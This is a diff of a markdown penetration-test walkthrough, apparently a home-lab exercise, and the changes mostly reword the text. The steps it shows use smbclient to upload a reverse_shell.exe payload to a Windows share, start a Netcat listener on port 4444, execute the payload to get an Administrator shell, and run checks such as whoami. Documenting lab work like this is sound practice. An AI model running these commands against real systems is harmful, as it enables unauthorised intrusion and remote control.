NourheneLdh/Project/home.md

 **Step 2: Uploading the Payload to the Target**

-I uploaded the payload to a writable share on the Windows Server:
+I uploaded the payload to a writable share on the Windows Server.
+The file was placed into the `ShareTest` directory for execution.
 ```bash
 smbclient //192.168.1.233/ShareTest -U BTarget
 put reverse_shell.exe
 ```
-The file was placed into the `ShareTest` directory for execution.

 **Step 3: Setting Up a Listener on Kali**

-To capture the incoming reverse connection, I set up a **Netcat** listener:
+To capture the incoming reverse connection, I set up a **Netcat** listener: This made Kali ready to accept incoming shells on port 4444.
 ```bash
 nc -lvnp 4444
 ```
-This made Kali ready to accept incoming shells on port 4444.

 **Step 4: Executing the Payload on Windows Server**

-On the target machine:
-- Navigated to the `ShareTest` folder.
-- **Double-clicked** on `reverse_shell.exe`.
+On the target machine I Navigated to the `ShareTest` folder and **Double-clicked** on `reverse_shell.exe`.
 This triggered a reverse connection back to Kali, and a full shell was established!

-**Post-Access Validation Commands**

-Once connected, I executed various system commands to validate full access:
+**Post-Access Validation Commands**: Once connected, I executed various system commands to validate full access:
 ```bash
 whoami        # Displays the current username (Administrator).
 hostname      # Shows the computer's name.